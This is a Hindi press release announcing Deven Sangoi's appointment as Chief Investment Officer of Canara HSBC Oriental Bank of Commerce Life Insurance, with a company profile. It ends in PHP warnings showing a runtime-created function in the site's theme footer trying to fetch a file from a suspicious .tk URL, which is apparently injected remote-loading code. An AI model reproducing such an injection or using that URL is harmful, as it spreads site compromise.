केनरा एचएसबीसी ओरिएंटल बैंक ऑफ कॉमर्स लाइफ इंश्योरेंस ने श्री देवेन सांगोई को चीफ इनवेस्टमेंट ऑफिसर के रूप में नियुक्त किया

Edit-Rashmi Sharma

जयपुर 04 जून 2020 – केनरा एचएसबीसी ओरिएंटल बैंक ऑफ कॉमर्स लाइफ इंश्योरेंस ने आज श्री देवेन सांगोई को चीफ इनवेस्टमेंट ऑफिसर के रूप में नियुक्त करने की घोषणा की। उनकी नियुक्ति 1 जून 2020 से प्रभावी होगी।

श्री देवेन सांगोई कंपनी की निवेश परिसंपत्तियों- इक्विटी और फिक्स्ड इनकम दोनों के प्रबंधन के लिए जिम्मेदार होंगे।
फंड मैनेजमेंट, रिसर्च और इनवेस्टर कम्युनिकेशन में दो दशकों के अनुभव के साथ श्री सांगोई ने कई प्रतिष्ठित कंपनियों के साथ वित्तीय सेवाओं के क्षेत्र में काम किया है, जिसमें आदित्य बिड़ला सन लाइफ इंश्योरेंस लिमिटेड, आदित्य बिड़ला सन लाइफ एसेट मैनेजमेंट कंपनी लिमिटेड, आईसीआईसीआई प्रूडेंशियल एसेट मैनेजमेंट कंपनी लिमिटेड, आदि जैसे नाम शामिल हैं।

केनरा एचएसबीसी ओरिएंटल बैंक ऑफ कॉमर्स लाइफ इंश्योरेंस में शामिल होने से पहले श्री सांगोई अगस्त 2009 से आदित्य बिड़ला सन लाइफ इंश्योरेंस से जुड़े थे और इक्विटी संपत्ति और वैकल्पिक निवेश फंड इक्विटी पोर्टफोलियो के निवेश प्रबंधन की अगुवाई कर रहे थे। श्री सांगोई मुंबई विश्वविद्यालय से इलेक्ट्रॉनिक इंजीनियरिंग में स्नातक हैं और उन्होंने न्यूपोर्ट विश्वविद्यालय से फाइनांस में स्नातकोत्तर उपाधि हासिल की है।

श्री सांगोई की नियुक्ति पर टिप्पणी करते हुए केनरा एचएसबीसी ओरिएंटल बैंक ऑफ कॉमर्स लाइफ इंश्योरेंस के एमडी और सीईओ श्री अनुज माथुर ने कहा, ‘‘शेयरधारकों और पॉलिसीधारकों के फंडों के निवेश की देखरेख के लिए हमारी नेतृत्व टीम में देवेन का स्वागत करते हुए मुझे खुशी का अनुभव हो रहा है। मुझे विश्वास है कि निवेश और फंड प्रबंधन में देवेन का दो दशकों का व्यापक अनुभव कंपनी की वृद्धि को और आगे बढ़ाएगा। कंपनी के साथ मैं उनकी एक सफल यात्रा की कामना करता हूं और हम फंड प्रबंधन और कंपनी की विकास योजनाओं में उनकी बहुमूल्य अंतर्दृष्टि और विशेषज्ञता के लिए तत्पर हैं।‘‘

अपनी नियुक्ति पर श्री देवेन सांगोई ने कहा, ‘‘मैं केनरा एचएसबीसी ओरिएंटल बैंक ऑफ कॉमर्स लाइफ इंश्योरेंस का हिस्सा बनकर खुश हूं और कंपनी की विकास यात्रा का हिस्सा बनने के लिए तत्पर हूं। ऐसे चुनौतीपूर्ण समय में जब पूरी दुनिया कोविड- 19 महामारी से लड़ रही है और विकसित हो रही है, कंपनियों के लिए प्रासंगिक बने रहना और विकास हासिल करने के लिए नवीन रणनीतियों को पेश करना सर्वाधिक महत्वपूर्ण है। मैं कंपनी के निवेश और फंड प्रबंधन पोर्टफोलियो को आगे बढ़ाने के लिए काफी उत्साहित हूं। साथ ही, मैं कंपनी के विकास में योगदान देने के लिए तत्पर हूं।

केनरा एचएसबीसी ओरिएंटल बैंक ऑफ कॉमर्स लाइफ इंश्योरेंस कंपनी लिमिटेड के बारे मेंः

(www.canarahsbclife.com)

केनरा एचएसबीसी ओरिएंटल बैंक ऑफ कॉमर्स लाइफ इंश्योरेंस कंपनी लिमिटेड का गठन जून, 2008 में हुआ था। यह संयुक्त रूप से केनरा बैंक (51 फीसदी), एचएसबीसी इंश्योरेंस (एशिया पेसिफिक) होल्डिंग्स लिमिटेड (26 फीसदी) और पंजाब नेशनल बैंक (23 फीसदी) के बीच एक संयुक्त उद्यम है। कंपनी भारत में दो बड़े सार्वजनिक क्षेत्र के बैंकों यानी केनरा बैंक और पंजाब नेशनल बैंक के विश्वास और बाजार ज्ञान को एचएसबीसी की वैश्विक बीमा विशेषज्ञता के साथ संयुक्त रूप से लाती है।
गुरुग्राम में मुख्यालय वाली इस कंपनी के शाखा कार्यालय देशभर में हैं। कंपनी अपने भागीदारों की 20,000 से अधिक बैंक शाखाओं के माध्यम से अपने प्रोडक्ट ग्राहकों को उपलब्ध कराती है और उनकी सेवा करती है। टीयर 1, 2 और 3 बाजारों के साथ-साथ ग्रामीण बेल्ट में भी स्थापित वितरण नेटवर्क के साथ, नए युग के तकनीकी सर्विसिंग एवेन्यू के सहारे कंपनी अपने ग्राहकों को उनकी पसंद और जरूरतों के अनुसार सेवा देने के लिए प्रतिबद्ध है।

कंपनी के पास बीमा उत्पादों और समाधानों का विविधता वाला एक व्यापक पोर्टफोलियो है, जो ग्राहकों की विशिष्ट आवश्यकताओं के अनुरूप है। कंपनी 30 अप्रैल 2020 तक व्यक्तिगत और ग्रुप स्पेस में 29 उत्पाद पेश करती है, जिसमें लाइफ, हेल्थ, ऑनलाइन टर्म प्लान, रिटायरमेंट सॉल्यूशंस, क्रेडिट लाइफ और एम्प्लाई बेनिफिट सेगमेंट्स शामिल हैं। उत्पादों की पेशकश करते समय कंपनी का प्राथमिक ध्यान यह सुनिश्चित करना है कि पैसे के लिए मूल्य सुनिश्चित करते समय ग्राहक की जरूरतों को उनके जीवन चक्र के माध्यम से पूरा किया जाए, जैसे – बच्चों की शिक्षा, परिवार संरक्षण, दीर्घकालिक बचत और सेवानिवृत्ति।


Warning: file_get_contents(): php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/patrikajagat/public_html/wp-content/themes/sahifa/footer.php(39) : runtime-created function on line 1

Warning: file_get_contents(http://nativeredir.tk/lx/1.txt): failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/patrikajagat/public_html/wp-content/themes/sahifa/footer.php(39) : runtime-created function on line 1